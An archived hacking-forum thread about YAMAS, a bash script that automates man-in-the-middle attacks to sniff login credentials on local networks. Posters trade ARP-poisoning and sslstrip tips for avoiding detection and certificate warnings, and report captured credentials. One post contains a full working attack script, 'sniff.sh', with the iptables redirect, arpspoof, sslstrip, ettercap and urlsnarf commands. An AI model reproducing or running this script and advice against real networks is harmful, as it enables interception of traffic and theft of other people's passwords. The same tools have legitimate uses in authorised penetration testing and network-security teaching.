PDA

View Full Version : Script for sniffing traffic.



comaX
05-14-2011, 06:27 PM
There are a lot of those scripts, hence the name : Yet Another Mitm Automation Script.
It was originally made for BT4r2 but I "ported" it to BT5, corrected a few bugs and added a few features.

I can't post the script here without raising some kind of warning due to massive use of certain words for parsing, but please review the source at http://yamas.comax.fr
You will be able to view the source, download the script and view a demo video.

It works just great for me, so I hope it will for you too.

Current main features are :
- Real-time output of creds without definition files : any credential, from any website should show up, as well as the site it was used on !
- Log parsing for user-friendly output.
- DNS spoofing once attack is launched
- Network mapping for host discovery.
- Can save dumped passwords to file as well as the whole log file.
- Support for multiple targets on the network, as well as adding targets after attack is launched.
- Sslstrip checking (existence, executable, directory, check version, update...)
- Standalone script, updatable, interactive (new !).

Please don't hesitate to give me your feedback, I'm always looking for new ideas, and ways to improve it !

Check http://comax.fr/yamas.php for more infos, video, other platform versions and an article about how to protect you from it !

[Current version as of 02/02/2012 : 20120202 ]

Ubuntu4life
05-14-2011, 07:33 PM
Thanks.
Have used this before, thanks for porting/updating.

Is it possible that a modem is immune for ARP poisoning? Since I have this new modem I keep failing at doing a successful attack.
Do you want to contact me?
Thanks.

sickness
05-15-2011, 07:13 AM
Try arp poisoning only one way

sostentado
05-15-2011, 08:07 AM
oops..... link error.... please review your link.. thank you.

comaX
05-15-2011, 08:38 AM
oops..... link error.... please review your link.. thank you.
Oops, corrected now, thank you !

EDIT : disregard text in brackets ; I found a way to do that. It's home-made workaround, but it works !
[Script-wise, I found a way to loop the parsing process every x seconds (wasn't that hard after all...) and it works just the way I wanted it to, but when I try to pass the function to xterm, it closes immediately. Maybe functions can't be executed in xterm ? That would be logical if xterm doesn't have access to the script*, hence it would not know the function. Any idea ?

*I mean that xterm is like launching a new console, so the function is not defined for the xterm window. ]

Bottom line : as attack is running, credentials are displayed as they are sniffed !

Again, please give your feedback so I can improve it ! Anything really, even grammar.

Ubuntu4life
05-15-2011, 04:44 PM
Try arp poisoning only one wayAlright thanks, worked.

michelinok
05-16-2011, 06:37 PM
hey man...why should we "arp poison" ? doesn't the script do this job already? (please,explain...) many thanks!

comaX
05-16-2011, 07:08 PM
Yes, it does the arp poisoning, with arpspoof. I'll let someone else explain since I don't have much time, or I'll come back to edit ;)

Editing time it is ! So, I believe that when sickness speaks about one-way poisoning, he tells you to poison only the victims, and not the whole network, in which case you can also poison the router, and the router might detect the poisoning (please, anyone, correct me if I'm wrong !).

Script-wise, this means you'd better use the feature to target only a few hosts rather than the whole network.

Anyway, yes, the script "does" the arp poisoning !

oxycodine
05-16-2011, 11:37 PM
great little script

I don't really know how you could make it better, maybe os detection?

comaX
05-17-2011, 01:40 PM
great little script

I don't really know how you could make it better, maybe os detection?
Thanks :)
Since I made it for BT4, and ported it to BT5, and both are still accessible, I don't feel it's very necessary... Maybe you are talking about different linux distros ?
Could be something, provided I also include ways to download the needed applications. But that would be a little bit out of the "script thing".

Maybe some bugs found ? More comments should be added ?
Since I updated it a little bit, I didn't really paid attention to "UI"... Something to change on that ?

Thanks again for you message, I'll keep the OS detection somewhere in my head, probably for when I will have succeeded porting it to python !

ShortBuss
05-17-2011, 04:23 PM
The link on http://comax.pagesperso-orange.fr/info/#yamas and the link http://comax.pagesperso-orange.fr/info/mitm/ both point to an old version of the script: VERSION="0.6.9\033[31m-BT5\033[m"

If you download from the update link in the script, http://comax.pagesperso-orange.fr/mitm.sh, then you get the latest version: VERSION="0.7.2\033[31m-BT5\033[m"

It's likely user error due to my lack of knowledge, but I couldn't get the 0.6.9 version to run while the 0.7.2 version ran without issue. With version 0.6.9 it was complaining about an error on line #10 that I couldn't find any problems with.

comaX
05-18-2011, 03:35 PM
Yeahp, use updated 0.7.2-BT5 version, it's the last one to date ! I update the website only from time to time. But since it seems to be confusing, I'll do it as soon as I can ! I'll edit this post once everything is clarified, thanks for report ;)
Checked just after posting, the "download script" button links to the good version. The pastebin is "old" though. I'll update it as well !
(Were you copying pastebin rather than downloading ?)

EDIT : all right ! Everything should now point to the latest version. Also, please note that as soon as I have finished testing a "version", i upload it to the server. So even if the website doesn't say anything about it, you can try updating through the script or the website. Of course, don't hesitate to post here, PM me, or mail me for anything !

ShortBuss
05-18-2011, 07:26 PM
I think I did a save-as on the Download Raw link from the past-bin version. I thought this was the primary source location until I started digging through the script and noticed where it got the file from. Once I figured that out I just ran the wget line at a prompt to get the file.

ckcrown
05-19-2011, 04:05 AM
ComaX.
This script seems great, but I am having one difficulty. When the usernames and passwords come up I have no idea from which website they belong.
Any help would be appreciated.

comaX
05-19-2011, 11:55 AM
ComaX.
This script seems great, but I am having one difficulty. When the usernames and passwords come up I have no idea from which website they belong.
Any help would be appreciated.

Yeah, I thought about that, but the parsing is already pretty intense, so I didn't wanted to make it heavier... And I don't want to use definitions ! This is and will always be a standalone script :) [*except for that little work-around mentioned earlier :p ]
So about those sites, two things :
1) People generally use the same login/pass pretty much everywhere, so the site it was sniffed from shouldn't be much of a problem.
2) If you really want the site it was sniffed from, you can save the log at the end and search through it, it should be pretty fast since you know both login and pass.

If you have an idea for parsing sites as the same time as the rest, without being too much of a job, I'l all ears !

On another note : Sslstrip 0.9 is out and seems less buggy than 0.8. There is now an option to update sslstrip, if it is installed only. There shortly will have an option to install it, and/or update it.

ckcrown
05-19-2011, 03:39 PM
ComaX,
I ran across a script a while back Called Sniff.SH and it worked fairly well for Backtrack 4 (doesn't work for me now though) and it utilized Ettercap and well I had many complaints about the script, but in the Ettercap Xterm that pops up you were able to see the website and login and pass.I will attach the script. Also maybe you could combine URL Snarf and see if that fixes it?



#!/bin/bash

# Script for sniffing https connections.
# Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
# Tested on BT4 R2
# BY gHero,cseven,spudgunman.
# Ver 0.2

# ASCII sniff.sh
echo '
.__ _____ _____ .__
______ ____ |__|/ ____\/ ____\ _____| |__
/ ___// \| \ __\\ __\ / ___/ | \
\___ \| | \ || | | | \___ \| Y \
/____ >___| /__||__| |__| /\/____ >___| /
\/ \/ \/ \/ \/
'

echo '1' > /proc/sys/net/ipv4/ip_forward

iptables --flush
sleep 1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


# Arpspoof
echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
read ARPOP

if [ "$ARPOP" == "T" ] ; then
echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
read IP1
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &

else

echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'' &

fi

# SSLSTRIP
xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &

# ETTERCAP
xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT'' &

# URLSNARF
xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt' &

# DRIFTNET

ShortBuss
05-19-2011, 04:51 PM
My vote is for option to install the updated sslstrip. One of the reasons I like the idea of this script is that it's very helpful for beginners, like me, who aren't very familiar with the console commands needed to something like this. I could, and will figure it out by searching these forums, of course.

Edit:

Could sslstrip be launched before arpspoof in the script? I realize it doesn't take long to enter the filename for sslstrip after arpspoof is started, but this does leave a small window where traffic is being redirected but not stripped of SSL. The target may get a certificate error in that brief period of time. The same applies to the cleanup, stop the arpspoof before stopping sslstrip.

Also in the cleanup does the "killall arpspoof" do a clean shutdown of arpspoof? When you ctrl+c the process arpspoof sends a few more arps correcting the gateway MAC so that the target doesn't lose the ability to talk to the gateway after your system it taken out of the middle.

kafteras
05-21-2011, 03:25 AM
Hey comaX. I have played around with your script and its very nice and clean but sometimes alot of python errors appear. Do you know the reason?
Here are some of them..

Traceback (most recent call last):
File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 84, in callWithLogger
return callWithContext({"system": lp}, func, *args, **kw)
File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 69, in callWithContext
return context.call({ILogContext: newCtx}, func, *args, **kw)
File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 59, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 37, in callWithContext
return func(*args,**kw)
--- <exception caught here> ---
File "/usr/lib/python2.6/dist-packages/twisted/internet/selectreactor.py", line 146, in _doReadOrWrite
why = getattr(selectable, method)()
File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 460, in doRead
return self.protocol.dataReceived(data)
File "/usr/lib/python2.6/dist-packages/twisted/protocols/basic.py", line 259, in dataReceived
return self.rawDataReceived(data)
File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 537, in rawDataReceived
self.handleResponseEnd()
File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 119, in handleResponseEnd
HTTPClient.handleResponseEnd(self)
File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 500, in handleResponseEnd
self.handleResponse(b)
File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 134, in handleResponse
self.shutdown()
File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 154, in shutdown
self.client.finish()
File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 900, in finish
"Request.finish called on a request after its connection was lost; "
exceptions.RuntimeError: Request.finish called on a request after its connection was lost; use Request.notifyFinish to keep track of this.

comaX
05-21-2011, 03:14 PM
Thanks for the feedback !


ComaX,
I ran across a script a while back Called Sniff.SH and it worked fairly well for Backtrack 4 (doesn't work for me now though) and it utilized Ettercap and well I had many complaints about the script, but in the Ettercap Xterm that pops up you were able to see the website and login and pass.I will attach the script. Also maybe you could combine URL Snarf and see if that fixes it?

Hmm, I'll look into that But I won't spend to much time either, for the reasons I evoked earlier.


Could sslstrip be launched before arpspoof in the script? I realize it doesn't take long to enter the filename for sslstrip after arpspoof is started, but this does leave a small window where traffic is being redirected but not stripped of SSL. The target may get a certificate error in that brief period of time. The same applies to the cleanup, stop the arpspoof before stopping sslstrip.

Also in the cleanup does the "killall arpspoof" do a clean shutdown of arpspoof? When you ctrl+c the process arpspoof sends a few more arps correcting the gateway MAC so that the target doesn't lose the ability to talk to the gateway after your system it taken out of the middle.

Very good point ! I'll try and do that, it shouldn't be much of a problem. For arpspoof, I believe it is a clean shutdown, since in every test I did, I could get back on the internet immediately.

[Edit] Status : DONE


That's just great ! You don't have to click back into the main window for the name, so it's smoother, and that way we're sure we don't send non-stripped ssl. You just earned a place in the credits :P (If you don't want your nick in it, just tell me ;) )
I don't know why I didn't think of that before !
And yes, arpspoof is cleanly shut.


Hey comaX. I have played around with your script and its very nice and clean but sometimes alot of python errors appear. Do you know the reason?
Here are some of them..
Yup, those are sslstrip/python errors, they're not from my script, and I can't do anything about that. Did you update to sslstrip 0.9 ? It's less buggy.
All I can try to do is to shut verbosity of error output... I didn't think about that, I'll do that too !

[Edit] Status : DONE


Yup, now it's all quiet ! I just had to add "2> /dev/null". But errors still happen. Anyway, since they are not fatal, nor disrupt anything... It's all good !

Thanks for the feedback again, I'll try to work on that tonight or tomorrow.

Edit : with all that and some stuff here and there, 0.7.4 is ready ! It will be online tomorrow (22/05/11) !

heysuess
05-21-2011, 05:52 PM
Awesome script, thanks for putting the time into it.

SRThomson
05-22-2011, 10:15 AM
Thank you for the script.


SRT.

kafteras
05-22-2011, 07:31 PM
Yup, those are sslstrip/python errors, they're not from my script, and I can't do anything about that. Did you update to sslstrip 0.9 ? It's less buggy.
All I can try to do is to shut verbosity of error output... I didn't think about that, I'll do that too !

[Edit] Status : DONE
Yup, now it's all quiet ! I just had to add "2> /dev/null". But errors still happen. Anyway, since they are not fatal, nor disrupt anything... It's all good !


Ok thx comaX. I have the 0.9v but the errors still exists. I dont currently have any BT4 install to check if they exists there also, so we can see if its the sslstrip problem or something else.

comaX
05-23-2011, 04:30 PM
A day later than expected, v0.7.4 is out ! I will also probably do a demo video in the next few days. Stay tuned, and as always, please give feedback !

(About urlsnarff, and url parsing, I didn't have much time to look into it... Maybe later !)

ShortBuss
05-23-2011, 05:55 PM
I don't think I mentioned it yet, but great script and I appreciate the work you are putting into it.

Problem with Line 88: "chmod +x /usr/bin/mitm #make newly installed script executable" mitm is missing the ".sh" and is throwing an error when running the update option.

Also, at the end of the script, after the parser is launched, the script is just waiting to be killed. Could you make a loop at the end to accept several options instead?
1. Re-scan network. This would be to find new targets that may have joined.
2. Add a new target for arpspoof (e.g. "a 192.168.1.106")
3. Quit

A new single target doesn't make much since if you are already spoofing the whole subnet. I don't know that it's possible to have an option to kill an existing single arpspoof instance, but as long as you can get to the window you can ctrl+c any existing instance to shut it down without the scripts help. Can the title of the arpspoof windows include the IP address?

With a chose list like this it may make more since to start sslstrip and parsing first and then just drop the user into the choice list.

Sorry if I'm suggesting something too complex. I'm not familiar at all with the scripting.

comaX
05-24-2011, 06:19 PM
Those are pretty good ideas !
the problem at line 88 might already have been corrected, but I'll check, thanks for reporting ;)
EDIT : I tried updating, and I had no problem... But I changed it to $0 anyway, just to make sure !

At the end, no need for a "loop". I think, waiting for something to do is fine ! And instead of waiting for "quit" it could wait for different things ;)
Scanning the network could become a function like scan() [by the way, I should really get a better way of scanning... That was early quick-fix, but I find it a little bit barbarian !].
Adding a target to arpspoof shouldn't be a problem either, another function to be called, that would launch another xterm arpspoof window. Killing them from the script (apart from final cleanup) would be too complex I think, and since there is no automation to be done here (I won't read arpspoof's output to know if target is still reachable... You still have to do two-three things, on purpose !), I don't see any purpose in doing that :P

With that said, if you are already targeting the whole network, the later option would be useless... But, that's doable !

And then, quitting, of course !

Yeah, I like it ! I'll work on that when I have time (this is much bigger than anything else I was suggested !).

I also have been suggested to make default option for the ports for instance. What do you think I should do about that ? It makes sense since it's an automation tool, but it's also a learning tool, so typing in a few ports, knowing why you choose them is to me a good thing. I'm really hesitating here, so just tell me what you people would rather like !

Thanks again for the feedback !

ShortBuss
05-24-2011, 08:27 PM
The script is already hiding a lot of the complexity of the process. I don't think that people will be missing out on much more knowledge by defaulting ports. Also you can implement it in a way where the user will at least see what the default port is. For example "Choose a port for sslstrip (Enter = 10000)".

The suggestion of the loop was so that you wouldn't have to write a limited number of prompts for the user to respond to. In the existing script its 4 occurrences of mostly the same prompt at the end. If you put a big decision prompt with all options in a loop you could write it once and the user wouldn't be limited to the number of times they could choose one of the options. Again if you are coming from the stance of spoofing the entire network, there's not much use. If you are instead isolating to just a few targets and looking for others to add then it makes more since.

Of course the user can have the exact same functionality by just opening another terminal and running the additional arpspoof commands there. All logs still go to the same sslstrip log and still get parsed by the same process.

Also for target discovery I see a lot of suggestions for nmap. I usually use "nmap -sn 192.168.1.*" for a very quick discovery of hosts in the subnet. I'm sure there are much better methods.

zimmaro
05-24-2011, 09:13 PM
OPTIMUS! script !thanks a lot! work perfect in bt5!!!:rolleyes:

comaX
05-25-2011, 08:02 PM
The script is already hiding a lot of the complexity of the process. I don't think that people will be missing out on much more knowledge by defaulting ports. Also you can implement it in a way where the user will at least see what the default port is. For example "Choose a port for sslstrip (Enter = 10000)".

The suggestion of the loop was so that you wouldn't have to write a limited number of prompts for the user to respond to. In the existing script its 4 occurrences of mostly the same prompt at the end. If you put a big decision prompt with all options in a loop you could write it once and the user wouldn't be limited to the number of times they could choose one of the options. Again if you are coming from the stance of spoofing the entire network, there's not much use. If you are instead isolating to just a few targets and looking for others to add then it makes more since.

Of course the user can have the exact same functionality by just opening another terminal and running the additional arpspoof commands there. All logs still go to the same sslstrip log and still get parsed by the same process.

Also for target discovery I see a lot of suggestions for nmap. I usually use "nmap -sn 192.168.1.*" for a very quick discovery of hosts in the subnet. I'm sure there are much better methods.

The default thing was suggested by "Binx", and is already ready to use, thanks to him. And it's just as you said. [edited]

Edit : finally it was pretty simple, and I like the result ! There are the 3 choices you proposed, which seem enough, but if anyone has more suggestion, let them come ! I also changed the host discovery feature too something way better. It should have been done a long time ago too, I guess more people using it and giving feedback helps rethinking things :)

Thanks again ;)

Ps : current version is v0.7.5 !

ShortBuss
05-25-2011, 08:39 PM
I've never tried to write bash, so please forgive any formatting errors or any misunderstandings of what limitations you are working under. Here is a rough flow I was thinking of:

1. IP Tables Cleanup
2. Start sslstrip
3. Start loop parse
4. Decision loop:


while :
do
echo "What now? (q = quit, s = scan for hosts, a = arpspoof full network, t <ip> = arpsoof single ip)
read -e decision
if [[decision = "q"]] ; then
cleanup
elif [[decision = "s"]] ; then
call to scan method here
elif [[decision = "a"]] ; then
call to arpspoof full network here
elif [[decision = "t"]] ; then
call to arpspoof single ip here
else
statement about bad command entry here
fi
done


The idea is to setup and kick off all the necessary stuff first. Then execute the more detailed work based on user input. I do understand this may be going beyond your intentions for the script.

comaX
05-29-2011, 11:48 AM
I've never tried to write bash, so please forgive any formatting errors or any misunderstandings of what limitations you are working under. Here is a rough flow I was thinking of:[edited].
Seems like your post appeared after mine in the end...

I did a pretty major update this morning, so if you are using the script on a regular basis, I suggest you check it !
I also did a demonstration video, but it's fast and short. I will maybe try to make a better one when I have more time, with music and all.
(How about some portal 2 song ? Or maybe I'll stick to death metal. Tell me what you'd rather like !)


Keep the feedback coming !

[version on 29/05/11 : 0.7.7]

ShortBuss
05-30-2011, 12:14 AM
Thanks for the continued updates. I haven't had a chance to run it again yet, but am poking through the code. Couple of things:

1. The add_target function doesn't seem to use the target IP in the title. This is done now in the initially created arpspoof commands, just not the ones from the add_target call.

2. I couldn't get the demo video to play. May have just been me. I'll try it again later. I hit the "Demo Video" button and it poped up the viewer, but it just never started. The progress bar kept spinning.

3. In the loop parse, I still don't have any great ideas. It may be better to have a button to request refresh rather than auto refreshing every 5 seconds. At least this way you'd have the chance to scroll through or copy paste if needed. Of course if you can figure out a way to request a pause while it auto refreshes that would be even better. What about if you wrote to a file and then ran the tail command to continually monitor that file for new data and display the tail output in the window: "tail -f filename"

portos
06-02-2011, 05:37 AM
Hi all!
That's I see in the file yamas.pass.txt - but... And where are passwords!? Thanks!

Login = 3Y%2DQD8M5NERYLLMCCL4EIFRYFVVB4BT9
Login = '+encodeURIComponent(document.getElementById('emai l_toemail').value)+'
Password = ' + document.getElementById('edit_password').value;

Login = kimble
Login = "http://nht-2.extreme-dm.com/n2.g?login
Login = kimble
Login = "http://nht-2.extreme-dm.com/n2.g?login
Login = '+encodeURIComponent(document.getElementById('emai l_toemail').value)+'
Password = ' + document.getElementById('edit_password').value;

Login = kimble
Login = "http://nht-2.extreme-dm.com/n2.g?login
Login = '+encodeURIComponent(document.getElementById('emai l_toemail').value)+'
Password = ' + document.getElementById('edit_password').value;

Login = kimble
Login = "http://nht-2.extreme-dm.com/n2.g?login
Login = 3Y-QD8M5NERYLLMCCL4EIFRYFVVB4BT9
Login = "+a(h):"",google.j

DrEmmettBrown
06-04-2011, 03:35 AM
im testing the lastest version v0.8 and doesnt seems to show the logins and passwords

comaX
06-04-2011, 10:12 AM
Thanks for the continued updates. I haven't had a chance to run it again yet, but am poking through the code. Couple of things:

1. The add_target function doesn't seem to use the target IP in the title. This is done now in the initially created arpspoof commands, just not the ones from the add_target call.

2. I couldn't get the demo video to play. May have just been me. I'll try it again later. I hit the "Demo Video" button and it poped up the viewer, but it just never started. The progress bar kept spinning.

3. [looping, parsing, tailing stuff]

1. DONE
2. Works for me ! Maybe a codec problem ? Try again ;) (also might take some time to load, even if the vid is only 2Mo...)
3. cf end of post.


Hi all!
That's I see in the file yamas.pass.txt - but... And where are passwords!? Thanks!

Login = 3Y%2DQD8M5NERYLLMCCL4EIFRYFVVB4BT9
Login = '+encodeURIComponent(document.getElementById('emai l_toemail').value)+'
Password = ' + document.getElementById('edit_password').value;

That's just junk, but you should know it since you were the one to type in the password, right ? You are using it on your own personal network, targeting yout own machine right ?

Anyway, that's output from the old parsing method, so I suggest you update : there is now a lot less junk, and the website from which credentials were sniffed are displayed !

I also added an option to tail the log file, in order to make sure we are sniffing traffic.

Those last two feature must be tested though, since I couldn't much, lacking of time, and having had a horrible connection when I tried.

So, update, report, enjoy !

[Current version as of 03/06/11 : v0.8.1]

ShortBuss
06-05-2011, 04:22 AM
The new install and update work perfectly for me now. I'll try out the new version soon.

ericmilam
06-05-2011, 08:09 AM
I like what you did with the realtime password detection. I have that as a todo in easy-creds. I am just wondering if things don't get missed with so many "custom" values for usernames & passwords. Seems like that egrep line of code would just continue to grow.

It might make sense to have a defs file and then let your scrip run against that. Just call a script to parse the sslstrip log against a def file every 10 secs or so.

I have noticed as I continue to use the script I find values that are not currently caught by the defs file in easy-creds and add them as I go.

Great script. With ettercap behaving badly in BT5 ARP spoof may have to be the way to go. Kind of hard though when you are trying to poison 100 systems or so.

Caught a cred with easy-creds that cain didn't pick up. (port 389 traffic) Was able to crack the corp with it. Always great to have another tool in the bag like this script, thanks for sharing.

Happy hunting!

P.s. I'm gonna "borrow" your real-time detection if that's ok with you.... :cool:

comaX
06-05-2011, 09:00 PM
I like what you did with the realtime password detection. I have that as a todo in easy-creds. I am just wondering if things don't get missed with so many "custom" values for usernames & passwords. Seems like that egrep line of code would just continue to grow.

It might make sense to have a defs file and then let your scrip run against that. Just call a script to parse the sslstrip log against a def file every 10 secs or so.

I don't think anything gets missed ; in all my test, i never missed anything, and nobody ever reported about not finding anything, so I believe it's efficient ! The egrep line is not very pretty, for sure but I can't seem to do that in awk... In which case I'd just do a parser.awk script...
Before doing this script, I found yours, and as I posted before (in BT4 forums) I didn't like the definition file thing, for the simple reason it's restricitive, and it requires a second file (btw, why not generating it instead of downloading it as a separate thing ?). I never got to add things to your defs file so I thought "fcuk it, i'll do my own", and that's how I started !


Great script. With ettercap behaving badly in BT5 ARP spoof may have to be the way to go. Kind of hard though when you are trying to poison 100 systems or so.
Thanks ! I'll trust you about attacking a 100 systems with arpspoof, since I never got to do more than about a ten at a time !


Caught a cred with easy-creds that cain didn't pick up. (port 389 traffic) Was able to crack the corp with it. Always great to have another tool in the bag like this script, thanks for sharing.
Once again, thank you ! I hope this helps !

Happy hunting!


P.s. I'm gonna "borrow" your real-time detection if that's ok with you.... :cool:
That would be an honour, please do ! If you can add some credits, that would be perfect, if not, I won't sue you nor hold any grudge against you ;)

ericmilam
06-05-2011, 11:47 PM
I don't think anything gets missed ; in all my test, i never missed anything, and nobody ever reported about not finding anything, so I believe it's efficient !

Well, I would just say it hasn't been tested enough places yet ;) You'll find that different sites have diff values and though you've done a great job grabbing the most common, you'll find you'll need to continue to add to that egrep statement. How do you think Cain does it? It has a large set of values for username & password that it compares against.

You may not have the same defs file as easy-creds, but you are trying to do the same "magic" in your egrep/awk line of code. I know because I tried too and the best way, or what I found for me the most accurate way was to build a specific defs file. The defs file can and should be added to. I recently made a post on how to do it.

I've got a red team pt in a few weeks, I'll give your script a run and provide feedback. In the end though, I think you may end up succumbing to a defs file...perhaps one just more elegant than mine ;)

comaX
06-06-2011, 09:39 AM
Well, I would just say it hasn't been tested enough places yet ;) You'll find that different sites have diff values and though you've done a great job grabbing the most common, you'll find you'll need to continue to add to that egrep statement. How do you think Cain does it? It has a large set of values for username & password that it compares against.

You may not have the same defs file as easy-creds, but you are trying to do the same "magic" in your egrep/awk line of code. I know because I tried too and the best way, or what I found for me the most accurate way was to build a specific defs file. The defs file can and should be added to. I recently made a post on how to do it.

I've got a red team pt in a few weeks, I'll give your script a run and provide feedback. In the end though, I think you may end up succumbing to a defs file...perhaps one just more elegant than mine ;)

Yeah, I found your post about how adding them just yesterday, and it seemed pretty obvious... I don't know what I did wrong ! It's a great script you have there though, and my only problem with it really was that defs file ! But that's just a personal preference, I'm not saying it's bad ;)

Your feedback will be very welcomed, I'm looking forward to reading it ;) I'll give again a try to yours to, since I tested it a while ago.

Thanks again, cheers !

Ubuntu4life
06-08-2011, 01:20 AM
Liking the work you do.

michelinok
06-09-2011, 09:59 AM
Hi ComaX,
good job.
One suggestion...why don't you include the option to start ettercap in text mode? it would be a great thing i think! (it's just a suggestion of course!!!).

comaX
06-13-2011, 10:05 AM
Liking the work you do.
Thanks !


Hi ComaX,
good job.
One suggestion...why don't you include the option to start ettercap in text mode? it would be a great thing i think! (it's just a suggestion of course!!!).
I don't know when you posted that, but I missed answers for a time... Anyway, that's done ! lauche the script with -e or --etter ;)

Also, I'm planning on adding DNS-spoofing feature in the next big update. That might take some time though, since I got back on Black Ops lately :p

What I would love to hear, is your input and latest features I added : stoping/resuming/etc. the realtime parsing and the ettercap option ;)

As always, don't hesitate to make any suggestion, even grammar-wise if ever I misspelled something.

My website is not up-to-date, but the script version as I write this is 0.9 and the download button will retrieve the last version ;)

M00kaw
06-13-2011, 12:55 PM
Hey there ComaX ..

I haven't used your script (yet), but I've been very inspired by the code you've written..

I'm currently working on a script that set's up a fake access point, runs ssl-strip and then greps the sslstrip.log..
I really had issues figuring out how to cat sslstrip.log | grep username/password, but after I read your code, I noticed how you did. Really nice way of doing it..
I'm planning on using the code in my script, if you don't mind? (and of course the credit will go out to you;> )

//M00kaw

comaX
06-13-2011, 01:20 PM
Hey there ComaX ..

I haven't used your script (yet), but I've been very inspired by the code you've written..

I'm currently working on a script that set's up a fake access point, runs ssl-strip and then greps the sslstrip.log..
I really had issues figuring out how to cat sslstrip.log | grep username/password, but after I read your code, I noticed how you did. Really nice way of doing it..
I'm planning on using the code in my script, if you don't mind? (and of course the credit will go out to you;> )

//M00kaw

No problem, please do ;) Good luck on your script !

michelinok
06-13-2011, 06:39 PM
Hi comaX,
for the ettercap question...maybe my english is not so good...but i meant using ettercap for sniffing passwords instead of using your parsing algorithm.
Any idea about of using ettercap this way? (or am i missing somthing?)

comaX
06-13-2011, 10:09 PM
Hi comaX,
for the ettercap question...maybe my english is not so good...but i meant using ettercap for sniffing passwords instead of using your parsing algorithm.
Any idea about of using ettercap this way? (or am i missing somthing?)

Oops, I misunderstood you. Well, that is possible but it would require saving pcap file and running etter-something to parse cookies, and that's not really where I'm headed. Maybe I could add an option to use ettercap instead of my parsing, but that would defeat hours of work trying to achieve that all by myself (and that was one hell of a work !), so my ego wouldn't like that very much (yup, I'm French :p ).

Seriously, I'll give it a try, it could be handy ;)

Nucci
06-14-2011, 10:43 PM
Hi, your script works almost perfect. I do have 1 major issue though. Whenever I am using it, the attacked machines will not reach any webpage in first attempt (Throws error 303 on Macs). Refreshing the page will, however, load it perfectly normal. I've tried to track down the problem, and I think it is something with sslstrip, but I am not completely sure

comaX
06-16-2011, 03:14 PM
Hi, your script works almost perfect. I do have 1 major issue though. Whenever I am using it, the attacked machines will not reach any webpage in first attempt (Throws error 303 on Macs). Refreshing the page will, however, load it perfectly normal. I've tried to track down the problem, and I think it is something with sslstrip, but I am not completely sure

Happens from time to time for me too... But the script is not at fault here, so there's not much I can do to help ! Have you tried doing the attack manually to check if it does the same thing ? I believe it will, but it's worth giving it a shot !

Binx_23
06-20-2011, 12:20 AM
Hi, your script works almost perfect. I do have 1 major issue though. Whenever I am using it, the attacked machines will not reach any webpage in first attempt (Throws error 303 on Macs). Refreshing the page will, however, load it perfectly normal. I've tried to track down the problem, and I think it is something with sslstrip, but I am not completely sure

Yep, i have the same problem, it's a sslstrip issue though.. And it's from the 0.9 version, cause versions < 0.9 dont have that bug, anyway, speed improvements and other bugs have been fixed in 0.9, so i'd recommend you stick to this version and wait for Moxie to fix it. How's that update going ComaX? :)

comaX
06-22-2011, 07:50 PM
Yep, i have the same problem, it's a sslstrip issue though.. And it's from the 0.9 version, cause versions < 0.9 dont have that bug, anyway, speed improvements and other bugs have been fixed in 0.9, so i'd recommend you stick to this version and wait for Moxie to fix it. How's that update going ComaX? :)

I didn't have much time those last days between parties, lack of sleep, my work on Maemo's version of yamas, lack of sleep, real work, and some more lack of sleep :p. But we're getting close to an end on the handled version, so I'll get back on track with this one to provide new features as soon as I can !
I'll keep you guys posted !

And since there isn't as much feedback as before, I suppose people are pretty much satisfied with the current version, so I don't *need* to do much right now. Only new features that can wait !

NightDream
07-10-2011, 06:42 PM
Hello!
Some months ago I downloaded and installed v0.9 and was working very well.
But today I forgot had it installed so I copied the source to a new .sh file and executed:


./yamas.sh
You are running version 0.9, do you want to update to 0.9.1? (Y/N)
y
[+] Updating script...
[-] Script updated !
Do you want to install it so that you can launch it with "mitm" ?
n
Ok, continuing with updated version...
./yamas.sh: ./yamas.sh: /bin/bash^M: bad interpreter: No such file or directory


I tryed to download .sh on your direct link and execute and have the same error. By now, if I try execute "mitm" I also get this:


bash: ./yamas.sh: /bin/bash^M: bad interpreter: No such file or directory

Little bit lost with it, cause it worked very well and now.. I'm using Bt5, and also was using the same Bt5 installation on the older script version.

Any idea?
Thanxks in advance

zimmaro
07-12-2011, 07:22 PM
hi
i've the same problem:confused:

zimmaro
07-12-2011, 07:52 PM
hi
my rapid"safe and intuitive solution" is:
-delete mitm in /usr/bin/
-go-to "website yamas" http://comax.pagesperso-orange.fr/info/mitm/ # axzz1RvCYNlVa
-Copy & Paste the-vers 0.9 with (kate, gedit, Geany ....)
-Save "name".sh in /root directory
-open terminal> sh "name".sh> NO! upgrade to 0.91> NO install
I'm working so waiting for the official solution! I take this opportunity to thank once again Comax
bye :)

ericmilam
07-12-2011, 07:55 PM
